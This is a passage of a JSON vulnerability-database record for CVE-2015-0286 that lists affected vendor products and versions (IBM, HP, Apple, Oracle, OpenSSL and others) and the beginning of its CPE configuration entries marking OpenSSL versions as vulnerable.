"ibm", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "icewall mcrp sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.35.00" }, { "model": "infosphere guardium database activity monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli provisioning manager for images", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.13" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "project openssl 1.0.0p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "openscape voice r1", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.3.0.3" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.8" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.3" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "pulse secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.7.7" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.0.2" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.0.1" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.3.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "system networking rackswitch g8264t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "icewall sso agent option update rele", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.2.0.3" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.18" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "system networking rackswitch g8124e", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.14.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.34" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.3.15" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.4" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "flex system fc5022 16gb san scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.41" }, { "model": "project openssl 0.9.8zd", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.3.0.2" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.14" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "netezza platform software 7.1.0.5-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "icewall sso dfw r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.31.16.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "worklight foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "system networking rackswitch g8124e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.3.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control agent", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "sterling connect:enterprise for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.37" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.3.20" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system networking rackswitch g8124", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.14.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.3.0.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.212" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.01" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4.1" }, { "model": "aspera orchestrator", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "worklight foundation enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "ctpos 6.6r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.9" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.4" }, { "model": "sametime unified telephony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.13" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.32" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "security network controller 1.0.3376m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "si4093 si fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.9" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "project openssl 0.9.8zf", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.5.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.0d5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.0.1" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.110" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.33" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "systems insight manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "i operating system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.2" }, { "model": "project openssl 1.0.0q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7.0" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.8" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "ctpos 6.6r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.18" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.4" }, { "model": "cognos controller fp1 if2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "icewall sso dfw r1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "73225" }, { "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "db": "NVD", "id": "CVE-2015-0286" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, 